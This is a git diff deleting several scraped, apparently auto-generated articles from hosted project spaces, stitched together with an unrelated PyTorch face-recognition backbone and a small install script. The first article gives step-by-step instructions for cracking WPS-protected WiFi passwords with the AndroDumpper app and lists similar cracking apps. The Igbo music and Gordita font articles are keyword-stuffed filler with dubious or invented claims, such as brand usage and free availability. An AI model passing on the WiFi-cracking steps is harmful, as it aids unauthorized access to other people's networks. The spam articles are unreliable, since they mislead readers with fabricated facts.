        1. Go to your device settings and tap on Security or Privacy.
        2. -
        3. Find the option that says Unknown sources or Install unknown apps and toggle it on.
        4. -
        5. A warning message will appear, telling you that installing apps from unknown sources can harm your device. Tap on OK or Allow to proceed.
        6. -
        -

        You can now install AndroDumpper 6.0.1 APK on your device.

        -

        You need to grant AndroDumpper 6.0.1 the necessary permissions to access WiFi networks

        -

        After you install AndroDumpper 6.0.1 APK on your device, you need to grant it the necessary permissions to access WiFi networks and other features.

        -

        To grant permissions, follow these steps:

        -
          -
        1. Open AndroDumpper 6.0.1 app and tap on Allow or Accept when prompted.
        2. -
        3. The app will ask for various permissions, such as Location, Storage, Phone, and Camera. Tap on Allow or Accept for each permission.
        4. -
        5. If you are using the root method, the app will also ask for root access. Tap on Grant or Confirm when prompted.
        6. -
        -

        You can now use AndroDumpper 6.0.1 app to hack WiFi passwords.

        -

        How to use AndroDumpper 6.0.1 to hack WiFi passwords?

        -

        You need to scan for available WiFi networks with WPS enabled

        -

        The first step to use AndroDumpper 6.0.1 app to hack WiFi passwords is to scan for available WiFi networks with WPS enabled.

        -

        To scan for WiFi networks, follow these steps:

        -
          -
        1. Open AndroDumpper 6.0.1 app and tap on the Scan button at the top right corner.
        2. -
        3. The app will scan for nearby WiFi networks and display them in a list.
        4. -
        5. The networks with WPS enabled will have a green icon next to them, while the ones without WPS will have a red icon.
        6. -
        7. You can also filter the networks by tapping on the Filter button at the bottom right corner and selecting WPS Only or All Networks.
        8. -
        -

        You can now select a network to hack its password.

        -

        You need to select a network and choose a method to connect: root or no root

        -

        The next step is to select a network and choose a method to connect: root or no root.

        -

        To select a network and choose a method, follow these steps:

        -
          -
        1. Tap on the network you want to hack and a pop-up window will appear.
        2. -
        3. The window will show you the network name, signal strength, security type, and MAC address.
        4. -
        5. At the bottom of the window, you will see two buttons: Try With and Custom PIN.
        6. -
        7. If you are using the root method, tap on Try With and select Root Method from the menu.
        8. If you are using the no root method, tap on Try With and select No Root Method from the menu.
        9. -
        10. If you want to use a custom PIN, tap on Custom PIN and enter the PIN you want to try.
        11. -
        -

        The app will then try to connect to the network using the method or PIN you selected.

        -

        You need to wait for AndroDumpper 6.0.1 to try different algorithms or passwords to connect

        -

        The next step is to wait for AndroDumpper 6.0.1 to try different algorithms or passwords to connect to the network.

        -

        To wait for the connection, follow these steps:

        -
          -
        1. A progress bar will appear at the bottom of the screen, showing you the status of the connection attempt.
        2. -
        3. The app will try different algorithms or passwords based on the network security type and WPS version.
        4. -
        5. The app will also show you the number of tries and the time elapsed.
        6. -
        7. If the connection is successful, a green message will appear, saying "Connected Successfully".
        8. -
        9. If the connection fails, a red message will appear, saying "Failed to Connect".
        10. -
        -

        You can now check if the connection is successful or not.

        -

        You need to check if the connection is successful or not

        -

        The final step is to check if the connection is successful or not.

        -

        To check the connection, follow these steps:

        -
          -
        1. If the connection is successful, you can tap on View Password to see the network password in plain text (root method only).
        2. -
        3. You can also tap on Copy Password to copy the password to your clipboard (root method only).
        4. -
        5. You can also tap on Connect Network to connect your device to the network using a proxy server (no root method only).
        6. -
        7. If the connection fails, you can tap on Try Again to retry the connection with a different algorithm or password.
        8. -
        9. You can also tap on Cancel to stop the connection attempt and return to the network list.
        10. -
        -

        You have now hacked a WiFi password using AndroDumpper 6.0.1 app.

        -

        What are the advantages and disadvantages of using AndroDumpper 6.0.1?

        -

        Advantages: easy to use, free, fast, and effective

        -

        AndroDumpper 6.0.1 has some advantages that make it a popular app for hacking WiFi passwords. Some of these advantages are:

        -
          -
        • It is easy to use: You just need to scan for networks, select a method, and wait for the connection.
        • -
        • It is free: You do not need to pay anything to download or use the app.
        • -
        • It is fast: You can hack a WiFi password in a matter of seconds or minutes depending on the network security and WPS version.
        • -
        • It is effective: You can hack most WiFi networks with WPS enabled using this app.
        • -
        -

        Disadvantages: illegal, unethical, risky, and full of ads

        -

        However, AndroDumpper 6.0.1 also has some disadvantages that make it a risky and unethical app for hacking WiFi passwords. Some of these disadvantages are:

        -
          -
        • It is illegal: Hacking WiFi passwords without permission is a crime in many countries and can lead to legal consequences.
        • -
        • It is unethical: Hacking WiFi passwords without permission is a violation of privacy and security of other people and can cause them harm or loss.
        • -
        • It is risky: Hacking WiFi passwords without permission can expose you to malware or viruses that may infect your device or steal your data.
        • -
        • It is full of ads: The app has many annoying ads that pop up frequently and interfere with your user experience.
        • -
        -

        Conclusion

        -

        AndroDumpper 6.0.1 is an Android app that can hack WiFi passwords using WPS vulnerability. It has two methods to connect to WiFi networks: root and no root. It also has a dictionary of common passwords for brute-force attacks. It is easy to download and install on your device, but you need to enable unknown sources and grant permissions. It is easy to use, but you need to scan for networks, select a method, wait for the connection, and check the result. It has some advantages such as being free, fast, and effective, but it also has some disadvantages such as being illegal, unethical, risky, and full of ads. Therefore, you should use this app with caution and responsibility.

        -

        Frequently Asked Questions

        -

        Q: A: What is WPS and why is it vulnerable?

        -

        WPS stands for WiFi Protected Setup and it is a feature that allows users to connect to a WiFi network by pressing a button on the router or entering a PIN code. However, this feature also has a vulnerability that makes it susceptible to brute-force attacks. A brute-force attack is when an attacker tries different combinations of numbers or letters to guess the correct password or PIN. WPS has a flaw that allows an attacker to try only 11,000 possible PINs instead of 10 million, which makes it easier to crack.

        -

        Q: How can I protect my WiFi network from AndroDumpper and other hacking apps?

        -

        There are some steps you can take to protect your WiFi network from AndroDumpper and other hacking apps. Some of these steps are:

        -
          -
        • Disable WPS on your router: You can disable WPS on your router by logging into your router settings and turning off the WPS option. This will prevent AndroDumpper and other apps from exploiting the WPS vulnerability.
        • -
        • Use a strong password: You can use a strong password for your WiFi network that is not easy to guess or crack. You can use a combination of uppercase and lowercase letters, numbers, and symbols. You can also use a passphrase that is a sentence or a phrase that you can remember easily.
        • -
        • Change your password regularly: You can change your password regularly to prevent anyone from accessing your network if they have hacked your password before. You can change your password every few months or whenever you suspect a breach.
        • -
        • Use encryption: You can use encryption for your WiFi network that scrambles the data that is transmitted over the network. You can use WPA2 or WPA3 encryption, which are the most secure encryption standards available.
        • -
        -

        Q: Is AndroDumpper legal and safe to use?

        -

        AndroDumpper is legal and safe to use only for network auditing purposes. Network auditing is when you test the security of your own network or a network that you have permission to access. However, if you use AndroDumpper for hacking WiFi passwords without permission, it is illegal and unsafe. Hacking WiFi passwords without permission is a crime in many countries and can lead to legal consequences. It is also unethical and immoral, as it violates the privacy and security of other people and can cause them harm or loss. Moreover, it is risky, as it can expose you to malware or viruses that may infect your device or steal your data.

        -

        Q: What are some alternatives to AndroDumpper for hacking WiFi passwords?

        -

        If you are looking for some alternatives to AndroDumpper for hacking WiFi passwords, you can try some of these apps:

        -
          -
        • WPS Connect: This app also exploits the WPS vulnerability and allows you to connect to WiFi networks with WPS enabled. It has a simple interface and shows you the network password in plain text.
        • -
        • WiFi Warden: This app also exploits the WPS vulnerability and allows you to connect to WiFi networks with WPS enabled. It has more features than AndroDumpper, such as generating strong passwords, analyzing WiFi networks, and creating QR codes.
        • -
        • WiFi Master Key: This app does not exploit the WPS vulnerability, but it allows you to connect to WiFi networks that are shared by other users. It has a large database of WiFi networks and passwords that are updated regularly.
        • -
        -

        Q: How can I contact the developer of AndroDumpper if I have any questions or feedback?

        -

        If you have any questions or feedback about AndroDumpper, you can contact the developer by using one of these methods:

        -
          -
        • Email: You can send an email to the developer at osamah.alhen@gmail.com
        • -
        • Facebook: You can follow the developer on Facebook at https://www.facebook.com/osama.abu.kmail
        • -
        • Twitter: You can follow the developer on Twitter at https://twitter.com/osamaabukmail
        • -

        401be4b1e0
        -
        -
        \ No newline at end of file diff --git a/spaces/fatiXbelha/sd/Enjoy Oge Chi Di Nma by Okey Jakota and Mayor Band of Nigeria - The Ultimate Igbo Highlife Playlist (Download Available).md b/spaces/fatiXbelha/sd/Enjoy Oge Chi Di Nma by Okey Jakota and Mayor Band of Nigeria - The Ultimate Igbo Highlife Playlist (Download Available).md deleted file mode 100644 index 732e38639386889331c1144f23d4f8e9048b740e..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/Enjoy Oge Chi Di Nma by Okey Jakota and Mayor Band of Nigeria - The Ultimate Igbo Highlife Playlist (Download Available).md +++ /dev/null @@ -1,92 +0,0 @@ -
        -

        Okey Jakota Oge Chi Di Nma Download: A Guide to Igbo Highlife Music

        -

        If you are a fan of African music, you may have heard of Igbo highlife music, a genre that combines traditional Igbo folk music with modern influences such as jazz, blues, and soul. Igbo highlife music is one of the most popular and influential forms of music in Nigeria, especially in the southeastern region where the Igbo people live. One of the artists who has contributed to the development and popularity of Igbo highlife music is Okey Jakota, whose song Oge Chi Di Nma (The Time God Says It Is Good) is a classic example of this genre. In this article, we will explore what Igbo highlife music is, who Okey Jakota is, and how to download his song Oge Chi Di Nma.

        -

        What is Igbo highlife music?

        -

        Igbo highlife music is a style of music that originated in the early 20th century among the Igbo people of southeastern Nigeria. It is a fusion of traditional Igbo folk music, which uses instruments such as drums, flutes, rattles, and xylophones, and modern influences such as jazz, blues, and soul, which use instruments such as guitars, saxophones, trumpets, and keyboards. Igbo highlife music is characterized by its upbeat tempo, melodic vocals, complex rhythms, and social commentary.

        -

        okey jakota oge chi di nma download


        DOWNLOADhttps://urllie.com/2uNFHo



        -

        The origin and history of Igbo highlife music

        -

        The origin of Igbo highlife music can be traced back to the colonial era, when Nigerian musicians were exposed to Western music through radio broadcasts, gramophone records, and live performances by visiting bands. Some of the early pioneers of Igbo highlife music were musicians such as E.T. Mensah from Ghana, Bobby Benson from Lagos, and Stephen Osita Osadebe from Onitsha. They adapted the highlife style that was popular in West Africa at the time, which was a blend of Ghanaian palm-wine music and jazz, to suit their local tastes and contexts. They incorporated elements from their native Igbo culture, such as proverbs, idioms, folktales, and religious beliefs, into their lyrics and melodies. They also used their music as a medium to express their opinions on social issues such as colonialism, nationalism, corruption, morality, and love.

        -

        The characteristics and features of Igbo highlife music

        -

        Igbo highlife music has several distinctive characteristics and features that make it unique and appealing. Some of these are:

        -
          -
        • The use of call-and-response patterns between the lead singer and the chorus or the audience.
        • -
        • The use of repetition and variation to create musical tension and release.
        • -
        • The use of syncopation and polyrhythm to create complex and dynamic beats.
        • -
        • The use of pentatonic scales and modes to create melodic harmony.
        • -
        • The use of brass instruments such as saxophones and trumpets to create bright and loud sounds.
        • -
        • The use of electric guitars to create rhythmic accompaniment and solo improvisation.
        • -
        • The use of keyboards to create rich chords and fillers.
        • -
        • The use of bass guitars to create low-pitched grooves.
        • -
        • The use of drums

          How to download Okey Jakota Oge Chi Di Nma and other Igbo highlife songs?

          -

          If you want to enjoy Okey Jakota Oge Chi Di Nma and other Igbo highlife songs on your device, you may want to download them from the internet. However, before you do that, you should be aware of the legal and ethical issues of downloading music online. You should also know the best websites and platforms to download Igbo highlife music. And finally, you should follow the steps and tips to download Okey Jakota Oge Chi Di Nma safely and easily.

          -

          The legal and ethical issues of downloading Igbo highlife music

          -

          Downloading music online is not always legal or ethical. It may violate the intellectual property rights of the artists and the record labels who own the music. It may also deprive them of their rightful income and recognition. Therefore, before you download any Igbo highlife music online, you should make sure that you have the permission of the owners or that the music is in the public domain or under a creative commons license. You should also respect the culture and values of the Igbo people and their music. You should not use their music for any inappropriate or offensive purposes. You should also give credit to the artists and the sources of the music whenever you use it.

          -

          The best websites and platforms to download Igbo highlife music

          -

          There are many websites and platforms that offer Igbo highlife music for download. However, not all of them are reliable, safe, or legal. Some of them may contain viruses, malware, or spyware that can harm your device or compromise your privacy. Some of them may also have low-quality or fake files that can ruin your listening experience. Therefore, you should be careful and selective when choosing where to download Igbo highlife music online. Some of the best websites and platforms that we recommend are:

          -
            -
          • NaijaLoaded: This is one of the most popular and trusted websites for downloading Nigerian music of all genres, including Igbo highlife music. It has a large and updated collection of songs by various artists, such as Okey Jakota, Oliver De Coque, Bright Chimezie, Ali Chukwuma, Onyenze Nwa Amobi, and many more. It also has a user-friendly interface and a fast download speed. You can visit the website at .
          • -
          • Igbo Highlife Music App: This is a mobile app that allows you to stream and download Igbo highlife music on your phone or tablet. It has a huge and diverse library of songs by different artists, such as Chief Stephen Osita Osadebe, Sir Warrior, Prince Nico Mbarga, Flavour N'abania, Phyno, Zoro, and many more. It also has a simple and elegant design and a smooth performance. You can download the app from Google Play Store at .
          • -
          • YouTube: This is a well-known and widely used platform for watching and downloading videos of all kinds, including Igbo highlife music videos. It has a vast and varied selection of songs by various artists, such as Umu Obiligbo, Chijioke Mbanefo, Ayaka Ozubulu, Ogene Boys, Oriental Brothers, and many more. It also has a high-quality and easy-to-use interface and a flexible download option. You can visit the website at or download the app from Google Play Store or Apple App Store.
          • -
          -

          The steps and tips to download Okey Jakota Oge Chi Di Nma

          -

          To download Okey Jakota Oge Chi Di Nma from any of the websites or platforms mentioned above, you can follow these general steps:

          -
            -
          1. Go to the website or platform of your choice.
          2. -
          3. Search for Okey Jakota Oge Chi Di Nma or browse through the categories or playlists.
          4. -
          5. Select the song from the results or suggestions.
          6. -
          7. Click on the download button or icon.
          8. -
          9. Choose the format and quality of the file.
          10. -
          11. Save the file to your device or cloud storage.
          12. -
          13. Enjoy listening to Okey Jakota Oge Chi Di Nma.
          14. -
          -

          Here are some tips to make your downloading process easier and better:

          -
            -
          • Make sure you have a stable internet connection and enough storage space on your device or cloud service.
          • -
          • Use a reputable antivirus software or app to scan the file before opening it.
          • -
          • Use a good media player or app to play the file.
          • -
          • Delete or backup the file after listening to it if you don't need it anymore.
          • -
          • Share the file with your friends and family if you like it.
          • -
          -

          Conclusion

          -

          Okey Jakota Oge Chi Di Nma is a wonderful song that showcases the beauty and richness of Igbo highlife music. It is a song that celebrates God's goodness and timing in our lives. It is also a song that inspires us to be grateful and happy. If you want to download this song and other Igbo highlife songs, you can use any of the websites or platforms that we have recommended in this article. However, you should also be mindful of the legal and ethical issues of downloading music online. You should respect the rights and culture of the artists and the Igbo people. You should also enjoy the music responsibly and share it with others.

          -

          Okey Jakota Oge Chi Di Nma lyrics
          -Oge Chi Di Nma by Okey Jakota mp3
          -Okey Jakota feat. Mayor Band of Nigeria
          -Oge Chi Di Nma song meaning
          -Okey Jakota World Music genre
          -Oge Chi Di Nma SoundCloud stream
          -Okey Jakota latest songs 2023
          -Oge Chi Di Nma Shazam track
          -Okey Jakota Nigerian artist biography
          -Oge Chi Di Nma video download
          -Okey Jakota Igbo music style
          -Oge Chi Di Nma translation in English
          -Okey Jakota best albums and singles
          -Oge Chi Di Nma remix version
          -Okey Jakota concert tickets and tour dates
          -Oge Chi Di Nma instrumental download
          -Okey Jakota fan club and social media
          -Oge Chi Di Nma cover art and design
          -Okey Jakota awards and nominations
          -Oge Chi Di Nma reviews and ratings
          -Okey Jakota collaborations and features
          -Oge Chi Di Nma guitar chords and tabs
          -Okey Jakota merchandise and memorabilia
          -Oge Chi Di Nma ringtone and notification sound
          -Okey Jakota net worth and income sources
          -Oge Chi Di Nma playlist and radio stations
          -Okey Jakota influences and inspirations
          -Oge Chi Di Nma background story and history
          -Okey Jakota interviews and podcasts
          -Oge Chi Di Nma live performance and recording

          -

          FAQs

          -

          Here are some frequently asked questions about Okey Jakota Oge Chi Di Nma and Igbo highlife music:

          -
            -
          1. What does Oge Chi Di Nma mean in English?
            Oge Chi Di Nma is an Igbo phrase that means The Time God Says It Is Good. It is a song title by Okey Jakota, a Nigerian highlife musician.
          2. -
          3. What is the difference between Igbo highlife music and other types of highlife music?
            Igbo highlife music is a style of highlife music that originated among the Igbo people of southeastern Nigeria. It is a fusion of traditional Igbo folk music and modern influences such as jazz, blues, and soul. It differs from other types of highlife music in its use of Igbo language, proverbs, idioms, folktales, and religious beliefs in its lyrics and melodies.
          4. -
          5. Who are some of the best Igbo highlife musicians?
            Some of the best Igbo highlife musicians are Chief Stephen Osita Osadebe, Oliver De Coque, Bright Chimezie, Ali Chukwuma, Onyenze Nwa Amobi, Umu Obiligbo, Chijioke Mbanefo, Ayaka Ozubulu, Ogene Boys, Oriental Brothers, Flavour N'abania, Phyno, Zoro, and many more.
          6. -
          7. Where can I listen to Igbo highlife music online?
            You can listen to Igbo highlife music online on various websites and platforms such as NaijaLoaded, Igbo Highlife Music App, YouTube, Spotify, Apple Music, SoundCloud, Audiomack, Boomplay, and many more.
          8. -
          9. How can I learn more about Igbo highlife music and culture?
            You can learn more about Igbo highlife music and culture by reading books, articles, blogs, magazines, newspapers, and journals on the topic. You can also watch documentaries, movies, shows, interviews, and videos on the topic. You can also visit museums, galleries, festivals, events, and places related to the topic. You can also talk to experts, scholars, artists, fans, and people who are knowledgeable about the topic.
          10. -

          401be4b1e0
          -
          -
          \ No newline at end of file diff --git a/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/backbones/iresnet2060.py b/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/backbones/iresnet2060.py deleted file mode 100644 index 21d1122144d207637d2444cba1f68fe630c89f31..0000000000000000000000000000000000000000 --- a/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/backbones/iresnet2060.py +++ /dev/null @@ -1,176 +0,0 @@ -import torch -from torch import nn - -assert torch.__version__ >= "1.8.1" -from torch.utils.checkpoint import checkpoint_sequential - -__all__ = ['iresnet2060'] - - -def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1): - """3x3 convolution with padding""" - return nn.Conv2d(in_planes, - out_planes, - kernel_size=3, - stride=stride, - padding=dilation, - groups=groups, - bias=False, - dilation=dilation) - - -def conv1x1(in_planes, out_planes, stride=1): - """1x1 convolution""" - return nn.Conv2d(in_planes, - out_planes, - kernel_size=1, - stride=stride, - bias=False) - - -class IBasicBlock(nn.Module): - expansion = 1 - - def __init__(self, inplanes, planes, stride=1, downsample=None, - groups=1, base_width=64, dilation=1): - super(IBasicBlock, self).__init__() - if groups != 1 or base_width != 64: - raise ValueError('BasicBlock only supports groups=1 and base_width=64') - if dilation > 1: - raise NotImplementedError("Dilation > 1 not supported in BasicBlock") - self.bn1 = nn.BatchNorm2d(inplanes, eps=1e-05, ) - self.conv1 = conv3x3(inplanes, planes) - self.bn2 = nn.BatchNorm2d(planes, eps=1e-05, ) - self.prelu = nn.PReLU(planes) - self.conv2 = conv3x3(planes, planes, stride) - self.bn3 = nn.BatchNorm2d(planes, eps=1e-05, ) - self.downsample = downsample - self.stride = stride - - def forward(self, x): - identity = x - out = self.bn1(x) - out = self.conv1(out) - out = self.bn2(out) - out = self.prelu(out) - out = self.conv2(out) - out = self.bn3(out) - if self.downsample is not None: - identity = self.downsample(x) - out += identity - return out - - -class IResNet(nn.Module): - fc_scale = 7 * 7 - - def __init__(self, - block, layers, dropout=0, num_features=512, zero_init_residual=False, - groups=1, width_per_group=64, replace_stride_with_dilation=None, fp16=False): - super(IResNet, self).__init__() - self.fp16 = fp16 - self.inplanes = 64 - self.dilation = 1 - if replace_stride_with_dilation is None: - replace_stride_with_dilation = [False, False, False] - if len(replace_stride_with_dilation) != 3: - raise ValueError("replace_stride_with_dilation should be None " - "or a 3-element tuple, got {}".format(replace_stride_with_dilation)) - self.groups = groups - self.base_width = width_per_group - self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=1, bias=False) - self.bn1 = nn.BatchNorm2d(self.inplanes, eps=1e-05) - self.prelu = nn.PReLU(self.inplanes) - self.layer1 = self._make_layer(block, 64, layers[0], stride=2) - self.layer2 = self._make_layer(block, - 128, - layers[1], - stride=2, - dilate=replace_stride_with_dilation[0]) - self.layer3 = self._make_layer(block, - 256, - layers[2], - stride=2, - dilate=replace_stride_with_dilation[1]) - self.layer4 = self._make_layer(block, - 512, - layers[3], - stride=2, - dilate=replace_stride_with_dilation[2]) - self.bn2 = nn.BatchNorm2d(512 * block.expansion, eps=1e-05, ) - self.dropout = nn.Dropout(p=dropout, inplace=True) - self.fc = nn.Linear(512 * block.expansion * self.fc_scale, num_features) - self.features = nn.BatchNorm1d(num_features, eps=1e-05) - nn.init.constant_(self.features.weight, 1.0) - self.features.weight.requires_grad = False - - for m in self.modules(): - if isinstance(m, nn.Conv2d): - nn.init.normal_(m.weight, 0, 0.1) - elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)): - nn.init.constant_(m.weight, 1) - nn.init.constant_(m.bias, 0) - - if zero_init_residual: - for m in self.modules(): - if isinstance(m, IBasicBlock): - nn.init.constant_(m.bn2.weight, 0) - - def _make_layer(self, block, planes, blocks, stride=1, dilate=False): - downsample = None - previous_dilation = self.dilation - if dilate: - self.dilation *= stride - stride = 1 - if stride != 1 or self.inplanes != planes * block.expansion: - downsample = nn.Sequential( - conv1x1(self.inplanes, planes * block.expansion, stride), - nn.BatchNorm2d(planes * block.expansion, eps=1e-05, ), - ) - layers = [] - layers.append( - block(self.inplanes, planes, stride, downsample, self.groups, - self.base_width, previous_dilation)) - self.inplanes = planes * block.expansion - for _ in range(1, blocks): - layers.append( - block(self.inplanes, - planes, - groups=self.groups, - base_width=self.base_width, - dilation=self.dilation)) - - return nn.Sequential(*layers) - - def checkpoint(self, func, num_seg, x): - if self.training: - return checkpoint_sequential(func, num_seg, x) - else: - return func(x) - - def forward(self, x): - with torch.cuda.amp.autocast(self.fp16): - x = self.conv1(x) - x = self.bn1(x) - x = self.prelu(x) - x = self.layer1(x) - x = self.checkpoint(self.layer2, 20, x) - x = self.checkpoint(self.layer3, 100, x) - x = self.layer4(x) - x = self.bn2(x) - x = torch.flatten(x, 1) - x = self.dropout(x) - x = self.fc(x.float() if self.fp16 else x) - x = self.features(x) - return x - - -def _iresnet(arch, block, layers, pretrained, progress, **kwargs): - model = IResNet(block, layers, **kwargs) - if pretrained: - raise ValueError() - return model - - -def iresnet2060(pretrained=False, progress=True, **kwargs): - return _iresnet('iresnet2060', IBasicBlock, [3, 128, 1024 - 128, 3], pretrained, progress, **kwargs) diff --git a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/scripts/install.sh b/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/scripts/install.sh deleted file mode 100644 index 7f9d8f49eb0b5359766eff5fd83de6cddee90eeb..0000000000000000000000000000000000000000 --- a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/scripts/install.sh +++ /dev/null @@ -1,6 +0,0 @@ -# conda create -n stylegan python=3.7 -# conda activate stylegan -conda install -c conda-forge/label/gcc7 opencv --yes -conda install tensorflow-gpu=1.15 cudatoolkit=10.0 --yes -conda install pytorch torchvision cudatoolkit=10.0 -c pytorch --yes -pip install -r requirements.txt diff --git a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Download Gordita a Minimal and Optically Balanced Typeface.md b/spaces/feregVcuzo/sanity-test-midi/checkpoint/Download Gordita a Minimal and Optically Balanced Typeface.md deleted file mode 100644 index a37ced576bc7c691f498e4dd4dde84ec6f965157..0000000000000000000000000000000000000000 --- a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Download Gordita a Minimal and Optically Balanced Typeface.md +++ /dev/null @@ -1,174 +0,0 @@ - -

          How to Download Gordita Font for Your Website

          -

          If you are looking for a minimal, geometric, and friendly sans serif font for your website, you might want to consider Gordita font. Gordita font is a modern typeface that has a human touch and a subtle personality. It is suitable for various web design projects, such as headlines, logos, banners, menus, and body text. In this article, we will show you how to download Gordita font for free from different sources, how to install it on your computer, and how to use it on your website.

          -

          What is Gordita Font and Why Use It?

          -

          Gordita font is a sans serif typeface that was designed by Thomas Gillett and published by Type Atelier. It is based on the popular Futura font, but with more organic and harmonious strokes. It also has some features inspired by Gotham font, such as the ink traps and the tapered joints. Gordita font has been tested in print and on screen in a wide range of sizes and weights. It supports over two hundred languages with an extended Latin and Cyrillic character set.

          -

          download gordita font


          Downloadhttps://gohhs.com/2uPrxd



          -

          Gordita Font Features and Characteristics

          -

          Gordita font has 14 styles, including seven weights (from thin to ultra) and matching italics. The italics are slightly lighter and narrower than the upright versions, and they slant at 15 degrees. The font also has many OpenType features, such as alternate glyphs, fractions, case sensitive forms, small figures, arrows, symbols, old style and tabular figures. Here is a table that shows some of the features of Gordita font:

          - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gordita Font Use Cases and Examples -

          Gordita font is a versatile typeface that can be used for various web design projects. It can create a clean, modern, and elegant look for your website. It can also convey a friendly, warm, and inviting tone for your audience. Here are some examples of websites that use Gordita font:

          -
            -
          • Airbnb: This popular online marketplace for travel and accommodation uses Gordita font for its logo, headlines, and body text. The font helps to create a sense of trust, comfort, and adventure for the users.
          • -
          • Spotify: This leading music streaming service uses Gordita font for its logo, menus, buttons, and labels. The font helps to create a sleek, minimal, and stylish interface for the users.
          • -
          • Shopify: This powerful e-commerce platform uses Gordita font for its logo, headings, and subheadings. The font helps to create a professional, reliable, and easy-to-use website for the users.
          • -
          • Dropbox: This cloud storage and file sharing service uses Gordita font for its logo, headings, and body text. The font helps to create a simple, clear, and secure website for the users.
          • -
          • Netflix: This popular online video streaming service uses Gordita font for its logo, menus, buttons, and labels. The font helps to create a dynamic, engaging, and entertaining website for the users.
          • -
          -

          Where to Find Gordita Font Online

          -

          If you want to download Gordita font for free, you have several options to choose from. Here are some of the best places to find Gordita font online:

          -

          Google Fonts

          -

          Google Fonts is one of the most popular and reliable sources of free fonts on the web. It has over 1,000 fonts that you can browse, preview, and download for your personal or commercial projects. You can also embed the fonts on your website using a simple code snippet. To find Gordita font on Google Fonts, you can use the search bar or the filter options. Here is the link to Gordita font on Google Fonts: https://fonts.google.com/specimen/Gordita

          -

          Fonts.com + SkyFonts

          -

          Fonts.com is another great source of free fonts on the web. It has over 150,000 fonts that you can browse, preview, and download for your personal or commercial projects. You can also sync the fonts on your computer using SkyFonts, a free app that lets you access and manage your fonts online. To find Gordita font on Fonts.com + SkyFonts, you can use the search bar or the filter options. Here is the link to Gordita font on Fonts.com + SkyFonts: https://www.fonts.com/font/type-atelier/gordita

          -

          FontBundles Free Fonts Collection

          -

          FontBundles is another awesome source of free fonts on the web. It has over 500 fonts that you can browse, preview, and download for your personal or commercial projects. You can also get access to exclusive deals and discounts on premium fonts every week. To find Gordita font on FontBundles Free Fonts Collection, you can use the search bar or the filter options. Here is the link to Gordita font on FontBundles Free Fonts Collection: https://fontbundles.net/free-fonts/gordita

          -

          Other Font Websites

          -

          There are many other websites that offer free fonts on the web. Some of them are:

          -
            -
          • DaFont: This website has over 40,000 fonts that you can browse, preview, and download for your personal or non-commercial projects.
          • -
          • Font Squirrel: This website has over 1,500 fonts that you can browse, preview, and download for your personal or commercial projects.
          • -
          • FontSpace: This website has over 80,000 fonts that you can browse, preview, and download for your personal or non-commercial projects.
          • -
          • UrbanFonts
          • : This website has over 8,000 fonts that you can browse, preview, and download for your personal or non-commercial projects. -
          -

          However, before you download any font from these websites, make sure to check the license and terms of use. Some fonts may have restrictions or limitations on how you can use them.

          -

          How to download gordita font for free
          -Download gordita font family with 14 styles
          -Gordita font webfont and desktop license
          -Gordita font features and opentype options
          -Gordita font review and comparison
          -Best websites to download gordita font
          -Gordita font alternatives and similar fonts
          -Gordita font usage and examples
          -Gordita font download link and installation guide
          -Gordita font discount and coupon code
          -Download gordita font for Mac and Windows
          -Gordita font compatibility and support
          -Gordita font thin and ultra weights
          -Gordita font design and history
          -Gordita font typography and inspiration
          -Download gordita font for logo and branding
          -Gordita font for print and web design
          -Gordita font for digital and email marketing
          -Gordita font for social media and content creation
          -Gordita font for UI and UX design
          -Download gordita font for WordPress and Shopify
          -Gordita font for e-commerce and online store
          -Gordita font for blog and magazine
          -Gordita font for portfolio and resume
          -Gordita font for presentation and infographic
          -Download gordita font for Adobe Photoshop and Illustrator
          -Gordita font for Figma and Sketch
          -Gordita font for Canva and Procreate
          -Gordita font for Microsoft Word and PowerPoint
          -Gordita font for Google Docs and Slides
          -Download gordita black italic and bold italic fonts
          -Download gordita light italic and medium italic fonts
          -Download gordita regular italic and thin italic fonts
          -Download gordita ultra italic and ultra fonts
          -Download gordita black and bold fonts
          -Download gordita light and medium fonts
          -Download gordita regular and thin fonts
          -Gordita black italic vs bold italic fonts comparison
          -Gordita light italic vs medium italic fonts comparison
          -Gordita regular italic vs thin italic fonts comparison

          -

          How to Install Gordita Font on Your Computer

          -

          Once you have downloaded Gordita font from one of the sources above, you need to install it on your computer so that you can use it in your applications. The installation process may vary depending on your operating system, but here are the general steps:

          -

          Download the Font Files

          -

          The first step is to download the font files from the website. Usually, the font files are compressed in a ZIP or RAR file. You need to save the file to a location that you can easily access, such as your desktop or downloads folder.

          -

          Unzip the Font Files

          -

          The next step is to unzip the font files from the compressed file. You can use a software like WinZip, WinRAR, or 7-Zip to extract the files. You should see one or more files with extensions like .otf, .ttf, or .woff. These are the font files that you need to install.

          -

          Install the Font Files

          -

          The final step is to install the font files on your computer. The method may differ depending on your operating system, but here are some common ways:

          -
            -
          • For Windows: Right-click on the font file and select Install. Alternatively, you can copy and paste the font file to the Fonts folder in your Control Panel.
          • -
          • For Mac: Double-click on the font file and click Install Font. Alternatively, you can drag and drop the font file to the Fonts folder in your Library.
          • -
          • For Linux: Copy and paste the font file to the .fonts folder in your home directory. Alternatively, you can use a font manager like Fonty Python or Font Manager.
          • -
          -

          After installing the font files, you should be able to use Gordita font in your applications.

          -

          How to Use Gordita Font on Your Website

          -

          If you want to use Gordita font on your website, you have two main options: embed the font with @font-face or use a webfont service. Here are the pros and cons of each option:

          -

          Embed the Font with @font-face

          -

          This option allows you to host the font files on your own server and link them to your website using CSS. You need to have a license that allows web usage for this option. Here are some advantages and disadvantages of this option:

          -
            -
          • Advantages: You have full control over the font files and how they are displayed on your website. You can customize the font size, weight, style, and other properties. You can also optimize the loading speed and performance of your website.
          • -
          • Disadvantages: You need to have technical skills and knowledge to implement this option. You also need to make sure that you have all the necessary formats and fallbacks for different browsers and devices. You may also face legal issues if you do not have a proper license for web usage.
          • -
